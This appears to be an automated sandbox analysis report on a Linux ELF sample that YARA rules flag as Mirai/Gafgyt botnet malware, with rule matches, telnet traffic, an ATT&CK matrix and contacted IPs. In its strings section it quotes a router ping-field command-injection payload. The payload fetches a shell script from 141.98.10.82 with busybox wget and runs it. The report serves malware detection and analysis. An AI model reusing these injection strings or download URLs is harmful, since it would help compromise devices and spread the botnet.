Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0141.98.10.82

Source: classification engine

Classification label: mal80.troj.linELF@0/0@0/0

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57818
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57824
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39008
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57836
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57840
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 57844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58190
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58194
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39018
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58196
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59068
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59076
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40250
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40902
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59720
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40916
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60114
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60118
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41296
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39892
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41302
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41304
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41310
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41312
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41320
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41402
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41408
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41414
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41416
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41420
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41428
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41430
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41434
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41438
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41440
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41444
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41448
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41450
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41498
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41508
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41510
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41516
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41526
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41530
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41548
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41552
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41570
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 41576
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42030
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42050
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42420
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42434
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 42804
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43978
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44006
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44016
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44030
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44044
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44052
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44068
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44092
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44112
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44120
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44130

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: enYTIDNSNe.elf, type: SAMPLE
Source: Yara match	File source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: enYTIDNSNe.elf, type: SAMPLE
Source: Yara match	File source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	2 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
enYTIDNSNe.elf	66%	ReversingLabs	Linux.Trojan.Mirai
enYTIDNSNe.elf	67%	Virustotal		Browse
enYTIDNSNe.elf	100%	Avira	EXP/ELF.Gafgyt.Gen.D
enYTIDNSNe.elf	100%	Joe Sandbox ML

Name	Source	Malicious	Antivirus Detection	Reputation
http://141.98.10.82/bins/Rakitin.sh	enYTIDNSNe.elf	false		unknown
http://141.98.10.82/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114	enYTIDNSNe.elf	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
170.43.8.207	unknown	United States	264957	CoopercitrusCooperativadeProdutoresRuraisBR	false
178.198.75.95	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
94.8.166.143	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
145.158.225.1	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
90.41.8.20	unknown	France	3215	FranceTelecom-OrangeFR	false
23.151.3.221	unknown	Reserved	33561	GREENHOUSE-WYUS	false
213.224.55.80	unknown	Belgium	6848	TELENET-ASBE	false
170.238.180.200	unknown	Brazil	266331	GlobalNetInformaticaLtdaBR	false
203.207.123.79	unknown	China	17964	DXTNETBeijingDian-Xin-TongNetworkTechnologiesCoLtd	false
170.145.146.228	unknown	United States	2048	LANET-1US	false
118.94.183.226	unknown	India	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
212.167.164.234	unknown	European Union	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
213.167.30.188	unknown	Bulgaria	28909	BG-TVSAT-ASBG	false
170.26.92.130	unknown	United States	23410	NET-NASSAU-BOCESUS	false
119.2.4.245	unknown	China	23724	CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation	false
79.82.239.244	unknown	France	15557	LDCOMNETFR	false
36.240.238.105	unknown	Japan	37903	EMOBILEYmobileCorporationJP	false
119.23.55.43	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
178.95.206.212	unknown	Ukraine	6849	UKRTELNETUA	false
181.59.4.7	unknown	Colombia	10620	TelmexColombiaSACO	false
182.60.194.193	unknown	India	17813	MTNL-APMahanagarTelephoneNigamLimitedIN	false
170.190.208.108	unknown	United States	33527	MGN-2US	false
178.71.171.215	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
181.47.141.63	unknown	Argentina	27747	TelecentroSAAR	false
146.239.92.93	unknown	United States	2018	TENET-1ZA	false
119.196.11.32	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
75.184.18.20	unknown	United States	11426	TWC-11426-CAROLINASUS	false
79.5.50.244	unknown	Italy	3269	ASN-IBSNAZIT	false
89.151.126.201	unknown	United Kingdom	24931	DEDIPOWERGB	false
84.229.162.157	unknown	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	false
213.223.177.60	unknown	France	8228	CEGETEL-ASFR	false
37.160.127.188	unknown	France	51207	FREEMFR	false
181.26.83.244	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
213.31.2.190	unknown	Belgium	6871	PLUSNETUKInternetServiceProviderGB	false
94.66.233.225	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
38.172.65.246	unknown	United States	174	COGENT-174US	false
62.131.13.127	unknown	Netherlands	1136	KPNKPNNationalEU	false
119.238.60.149	unknown	Japan	2518	BIGLOBEBIGLOBEIncJP	false
119.169.248.141	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
191.47.176.234	unknown	Brazil	7738	TelemarNorteLesteSABR	false
179.59.217.104	unknown	Bolivia	28024	NuevatelPCSdeBoliviaSABO	false
125.149.218.12	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
170.148.227.226	unknown	United States	38481	JPMORGAN-TRANSIT-AS-SG-APJPMORGANSingaporeSG	false
178.139.81.169	unknown	Spain	12430	VODAFONE_ESES	false
178.132.250.162	unknown	Sweden	45011	SE-A3httpwwwa3seSE	false
178.114.204.63	unknown	Austria	8437	UTA-ASAT	false
129.206.24.151	unknown	Germany	553	BELWUEBelWue-KoordinationEU	false
118.160.244.99	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
178.129.91.46	unknown	Russian Federation	28812	JSCBIS-ASRU	false
62.156.228.146	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
119.47.10.44	unknown	Japan	55385	DADigitalAllianceCoLtdJP	false
171.145.133.64	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
86.249.34.85	unknown	France	3215	FranceTelecom-OrangeFR	false
145.51.224.227	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
179.8.44.150	unknown	Chile	7418	TELEFONICACHILESACL	false
79.37.106.140	unknown	Italy	3269	ASN-IBSNAZIT	false
109.248.243.44	unknown	Russian Federation	197577	KOMTELECOM-ASRU	false
135.138.183.41	unknown	United States	14962	NCR-252US	false
170.10.219.169	unknown	United States	63399	DIALPADUS	false
109.48.129.160	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
72.124.179.155	unknown	United States	22394	CELLCOUS	false
2.223.201.82	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
213.180.97.137	unknown	Latvia	20910	BALTKOM-ASLV	false
42.66.153.29	unknown	Taiwan; Republic of China (ROC)	17421	EMOME-NETMobileBusinessGroupTW	false
46.196.21.85	unknown	Turkey	47524	TURKSAT-ASTR	false
210.232.162.171	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
178.154.71.32	unknown	Belarus	44087	BEST-ASBY	false
108.2.102.237	unknown	United States	701	UUNETUS	false
62.213.110.45	unknown	Russian Federation	25227	ASN-AVANTEL-MSKLocatedinMoscowRussiaRU	false
34.85.103.103	unknown	United States	15169	GOOGLEUS	false
148.216.187.46	unknown	Mexico	13999	MegaCableSAdeCVMX	false
213.235.199.100	unknown	Austria	8437	UTA-ASAT	false
119.196.11.10	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
84.229.8.118	unknown	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	false
198.91.192.43	unknown	Canada	11814	DISTRIBUTEL-AS11814CA	false
181.222.227.120	unknown	Brazil	28573	CLAROSABR	false
109.67.199.166	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	false
